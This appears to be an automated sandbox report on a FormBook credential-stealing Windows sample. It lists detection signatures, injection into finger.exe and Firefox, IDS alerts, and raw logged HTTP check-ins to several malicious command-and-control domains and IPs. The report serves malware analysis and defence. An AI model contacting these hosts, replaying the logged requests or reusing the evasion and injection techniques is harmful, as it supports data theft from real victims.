Windows Analysis Report
wSoShbuXnJ.exe

Overview

General Information

Sample name: wSoShbuXnJ.exe
renamed because original name is a hash value
Original sample name: 9e1267edbe153e189be7f1f47a6ceba109a8103ce9f6f7daa5b9ef62800596e5.exe
Analysis ID: 1588797
MD5: feea3eb7d321ac0ff06d81683ac140ed
SHA1: 9a18261e4703b51dec32610dd0c822de8ba2d752
SHA256: 9e1267edbe153e189be7f1f47a6ceba109a8103ce9f6f7daa5b9ef62800596e5
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • wSoShbuXnJ.exe (PID: 7440 cmdline: "C:\Users\user\Desktop\wSoShbuXnJ.exe" MD5: FEEA3EB7D321AC0FF06D81683AC140ED)
    • wSoShbuXnJ.exe (PID: 7960 cmdline: "C:\Users\user\Desktop\wSoShbuXnJ.exe" MD5: FEEA3EB7D321AC0FF06D81683AC140ED)
      • RAdsmABlJtKpzt.exe (PID: 7136 cmdline: "C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • finger.exe (PID: 6668 cmdline: "C:\Windows\SysWOW64\finger.exe" MD5: C586D06BF5D5B3E6E9E3289F6AA8225E)
          • RAdsmABlJtKpzt.exe (PID: 6336 cmdline: "C:\Program Files (x86)\oLZJVTVvjdrtvjcQVZMxuPoJpPEShmctdloRnbrwGcjhAOdsKcTJfWqydzHraBwjQIULnkgKVBjIANlX\RAdsmABlJtKpzt.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6648 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.1788457173.0000000001380000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.3140404421.0000000002E40000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000B.00000002.3140545475.00000000030D0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000B.00000002.3140592825.0000000003120000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
8.2.wSoShbuXnJ.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
8.2.wSoShbuXnJ.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched

                AV Detection

                Source: http://elinor.club/1ne4/?rFbdy=Xmf7DtAQ/BnKPHUt3tFFFAvira URL Cloud: Label: malware
                Source: http://www.graviton.energy/y54z/?rFbdy=oqT6mesMFtjVx9Zo+WJYx+2EviEW1FInvVPBS1/+zHYUGg1LXtrFdHCKa7buL2o/Gnc6meWbbP401AFPslg2Utdxtkuh/i2NXcwPRnV0pzGWMtWrhQ==&UPxHl=S80HqRlhnAvira URL Cloud: Label: malware
                Source: http://www.ausyva4.top/p9tq/Avira URL Cloud: Label: malware
                Source: http://www.elinor.club/1ne4/Avira URL Cloud: Label: malware
                Source: http://www.primespot.live/b8eq/?rFbdy=gCO4eBiOGzjIUF4Ojd1mJSXRG6iw/sOo1+eSlxtvQuGR+yQgcmFlfWYEu8/uSxX90okqxX/f1dseedlMe+CxOjcLE64JXGvlhnvggg9FHXGMXdp+Vw==&UPxHl=S80HqRlhnAvira URL Cloud: Label: malware
                Source: http://www.e8af.xyzAvira URL Cloud: Label: malware
                Source: http://www.ausyva4.top/p9tq/?UPxHl=S80HqRlhn&rFbdy=2ms3SAJ3/Y72jDOYcVaNzEXGx76Mph7m+YVIXk8EkhJXwsY9KxDO5xtAZPzCU4fVpNNcB8PkealyXuVaLMOCDp5jVhhqAxzh3q6rpxv8ZEWBJyfI2w==Avira URL Cloud: Label: malware
                Source: http://www.ausyva4.top/p9tq/?UPxHl=S80HqRlhn&rFbdy=2ms3SAJ3/Y72jDOYcVaNzEXGx76Mph7mAvira URL Cloud: Label: malware
                Source: http://www.e8af.xyz/hhdc/Avira URL Cloud: Label: malware
                Source: http://www.graviton.energy/y54z/Avira URL Cloud: Label: malware
                Source: http://www.elinor.club/1ne4/?rFbdy=Xmf7DtAQ/BnKPHUt3tFFF+cFa+JkL4JTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI0DRem6aH9Trs8UjwAd6A78giMTOqUw==&UPxHl=S80HqRlhnAvira URL Cloud: Label: malware
                Source: http://www.primespot.live/b8eq/Avira URL Cloud: Label: malware
                Source: wSoShbuXnJ.exeVirustotal: Detection: 76%Perma Link
                Source: wSoShbuXnJ.exeReversingLabs: Detection: 71%
                Source: Yara matchFile source: 8.2.wSoShbuXnJ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.wSoShbuXnJ.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3137743344.0000000002930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1788457173.0000000001380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.3140404421.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3140545475.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3140592825.0000000003120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1786669881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3140429074.0000000004590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1795225948.0000000002DF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: wSoShbuXnJ.exeJoe Sandbox ML: detected
                Source: wSoShbuXnJ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: wSoShbuXnJ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: finger.pdb source: wSoShbuXnJ.exe, 00000008.00000002.1787552487.0000000001038000.00000004.00000020.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000A.00000002.3139651426.0000000001538000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RAdsmABlJtKpzt.exe, 0000000A.00000000.1710250709.0000000000D0E000.00000002.00000001.01000000.0000000C.sdmp, RAdsmABlJtKpzt.exe, 0000000C.00000002.3137744044.0000000000D0E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: wSoShbuXnJ.exe, 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000B.00000003.1789743504.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000B.00000003.1786573717.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: wSoShbuXnJ.exe, wSoShbuXnJ.exe, 00000008.00000002.1789813470.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 0000000B.00000002.3140702955.0000000003250000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000B.00000002.3140702955.00000000033EE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 0000000B.00000003.1789743504.00000000030A7000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 0000000B.00000003.1786573717.0000000002EF9000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: finger.pdbGCTL source: wSoShbuXnJ.exe, 00000008.00000002.1787552487.0000000001038000.00000004.00000020.00020000.00000000.sdmp, RAdsmABlJtKpzt.exe, 0000000A.00000002.3139651426.0000000001538000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\finger.exeCode function: 11_2_0294C7B0 FindFirstFileW,FindNextFileW,FindClose,11_2_0294C7B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then xor eax, eax11_2_02939F20
                Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then pop edi11_2_0293E3A1
                Source: C:\Windows\SysWOW64\finger.exeCode function: 4x nop then mov ebx, 00000004h11_2_035A04BE

                Networking

                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49987 -> 134.122.191.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49990 -> 156.234.28.101:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49980 -> 104.21.86.111:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49980 -> 104.21.86.111:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50007 -> 104.21.48.233:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50008 -> 104.21.48.233:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49989 -> 134.122.191.187:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49989 -> 134.122.191.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49988 -> 134.122.191.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49991 -> 156.234.28.101:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49984 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:50005 -> 185.101.158.113:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49985 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50005 -> 185.101.158.113:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49985 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49998 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50003 -> 185.101.158.113:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:50009 -> 104.21.48.233:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50009 -> 104.21.48.233:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49982 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50006 -> 104.21.48.233:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49983 -> 194.58.112.174:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49986 -> 134.122.191.187:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50000 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49997 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49997 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49999 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49995 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:50001 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:50001 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49993 -> 156.234.28.101:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49993 -> 156.234.28.101:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50010 -> 3.252.97.86:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50004 -> 185.101.158.113:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50002 -> 185.101.158.113:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49994 -> 209.74.79.42:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49992 -> 156.234.28.101:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:50011 -> 3.252.97.86:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49996 -> 209.74.79.42:80
                Source: DNS query: www.pbfgm.xyz
                Source: DNS query: www.e8af.xyz
                Source: Joe Sandbox ViewIP Address: 209.74.79.42 209.74.79.42
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: Joe Sandbox ViewASN Name: BCPL-SGBGPNETGlobalASNSG BCPL-SGBGPNETGlobalASNSG
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /fjd6/?UPxHl=S80HqRlhn&rFbdy=beVfoldUF3/aok0KBGpVP1gUCt6NMj5apzZJ64FbAFAGDRV4pYz0MK1VY/vkdFXAOWskmP9Sk8tWhxHaAHTK7lRuvsCGk6bq0J+DGmomegCt+S+Krw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.pbfgm.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /1ne4/?rFbdy=Xmf7DtAQ/BnKPHUt3tFFF+cFa+JkL4JTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI0DRem6aH9Trs8UjwAd6A78giMTOqUw==&UPxHl=S80HqRlhn HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.elinor.clubConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /s6zh/?rFbdy=3lPbUJ/4EMFnMU31nNkM0sT5MNepbRdhjqRifsXJf3a7S0x2d/GglTvwUDIMpGCMSyBp4aVeuGLlN5/zkDRsBqJqOmuwjboa7nAzI9uQyNNQORSZ1w==&UPxHl=S80HqRlhn HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.smalleyes.icuConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /dp9c/?UPxHl=S80HqRlhn&rFbdy=fIUCD8Yz2nphKcMxyO4tlSIcMJ/+EEeHC1g1rmDhwR9J1RiwCtlWpXo9Zxpli6GkENLWknkKup+McE28ApWDF3/VOwEaJ+vjCUy5RvaSFOliQEf2CQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.btblxhh.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /b8eq/?rFbdy=gCO4eBiOGzjIUF4Ojd1mJSXRG6iw/sOo1+eSlxtvQuGR+yQgcmFlfWYEu8/uSxX90okqxX/f1dseedlMe+CxOjcLE64JXGvlhnvggg9FHXGMXdp+Vw==&UPxHl=S80HqRlhn HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.primespot.liveConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /e1ut/?UPxHl=S80HqRlhn&rFbdy=fGTNjk6zk5H6mZem55oD5grLw/UWVVRjfCwqsuvIEvy1a98DW/HAQiAN9onJYw2/Zx4HIDjcQpN8hNtj+4iqwZ8RJUTFht+lVAJMGtZIrPPR90IjtQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.mohawktooldie.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /y54z/?rFbdy=oqT6mesMFtjVx9Zo+WJYx+2EviEW1FInvVPBS1/+zHYUGg1LXtrFdHCKa7buL2o/Gnc6meWbbP401AFPslg2Utdxtkuh/i2NXcwPRnV0pzGWMtWrhQ==&UPxHl=S80HqRlhn HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.graviton.energyConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /p9tq/?UPxHl=S80HqRlhn&rFbdy=2ms3SAJ3/Y72jDOYcVaNzEXGx76Mph7m+YVIXk8EkhJXwsY9KxDO5xtAZPzCU4fVpNNcB8PkealyXuVaLMOCDp5jVhhqAxzh3q6rpxv8ZEWBJyfI2w== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.ausyva4.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.pbfgm.xyz
                Source: global trafficDNS traffic detected: DNS query: www.phdcoach.pro
                Source: global trafficDNS traffic detected: DNS query: www.elinor.club
                Source: global trafficDNS traffic detected: DNS query: www.smalleyes.icu
                Source: global trafficDNS traffic detected: DNS query: www.btblxhh.top
                Source: global trafficDNS traffic detected: DNS query: www.primespot.live
                Source: global trafficDNS traffic detected: DNS query: www.mohawktooldie.online
                Source: global trafficDNS traffic detected: DNS query: www.graviton.energy
                Source: global trafficDNS traffic detected: DNS query: www.ausyva4.top
                Source: global trafficDNS traffic detected: DNS query: www.e8af.xyz
                Source: unknownHTTP traffic detected: POST /1ne4/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflate, brHost: www.elinor.clubOrigin: http://www.elinor.clubContent-Type: application/x-www-form-urlencodedConnection: closeContent-Length: 194Cache-Control: no-cacheReferer: http://www.elinor.club/1ne4/User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 04:43:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BT9j5wwI%2FnJbbeybh1Tzn7pNMs0Ulef8TNyLEgKtg2pmK3VpUv7RZ0ehe1Bt0oLSAyaCIcPhKJlSLvqRKmMN4%2BZOdVPgKuK%2Fik%2BuvAJaemgVZ71hJ1qGAzWAL0wa0w03"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90023eedbe44430f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1809&min_rtt=1809&rtt_var=904&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=538&delivery_rate=0&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: kangle/3.5 Date: Sat, 11 Jan 2025 04:32:03 GMT Set-Cookie: home_lang=cn; path=/ Content-Type: text/html; charset=utf-8 X-Cache: MISS from kangle web server Transfer-Encoding: chunked Connection: close
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: kangle/3.5 Date: Sat, 11 Jan 2025 04:32:06 GMT Set-Cookie: home_lang=cn; path=/ Content-Type: text/html; charset=utf-8 X-Cache: MISS from kangle web server Transfer-Encoding: chunked Connection: close
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: kangle/3.5 Date: Sat, 11 Jan 2025 04:32:08 GMT Set-Cookie: home_lang=cn; path=/ Content-Type: text/html; charset=utf-8 X-Cache: MISS from kangle web server Transfer-Encoding: chunked Connection: close
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: kangle/3.5 Date: Sat, 11 Jan 2025 04:32:11 GMT Set-Cookie: home_lang=cn; path=/ Content-Type: text/html; charset=utf-8 X-Cache: MISS from kangle web server Transfer-Encoding: chunked Connection: close
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 04:44:32 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 04:44:34 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 04:44:37 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 04:44:39 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
